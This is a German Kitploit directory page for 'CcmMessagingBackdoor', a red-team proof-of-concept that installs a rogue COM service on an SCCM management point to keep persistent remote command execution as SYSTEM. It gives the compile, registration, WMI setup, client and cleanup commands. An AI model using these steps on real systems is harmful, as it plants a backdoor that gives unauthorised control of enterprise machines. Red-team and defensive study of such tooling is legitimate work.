Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CcmMessagingBackdoor — Proof-of-Concept-Backdoor für den SCCM-Verwaltungspunkt unter Verwendung eines unechten COM-Dienstes zur persistenten Remote-Befehlsausführung als SYSTEM. | Kitploit
Tools/GitHubGitHub/synacktiv/ccmmessagingbackdoor
PersistenzmechanismenPost-ExploitationCommand and ControlRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

Proof-of-Concept-Backdoor für den SCCM-Verwaltungspunkt unter Verwendung eines unechten COM-Dienstes zur persistenten Remote-Befehlsausführung als SYSTEM.

Repository anzeigen
192vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CcmMessagingBackdoor

Proof-of-Concept-Werkzeuge zum Erstellen und Installieren eines unechten CcmMessaging-Dienstes, um den Zugriff auf einen Management Point aufrechtzuerhalten.

Verwendung

  • Kompilieren und Installieren des unechten COM-Dienstes auf dem Management Point
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • Konfigurieren des Dienst-Endpunkts in WMI
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Verwenden des Python-Clients zum Ausführen von PowerShell-Befehlen
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • Zum Bereinigen
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • Zufälligen Absturz des CcmExec-Prozesses beheben (Grund derzeit unbekannt)
Tool herunterladen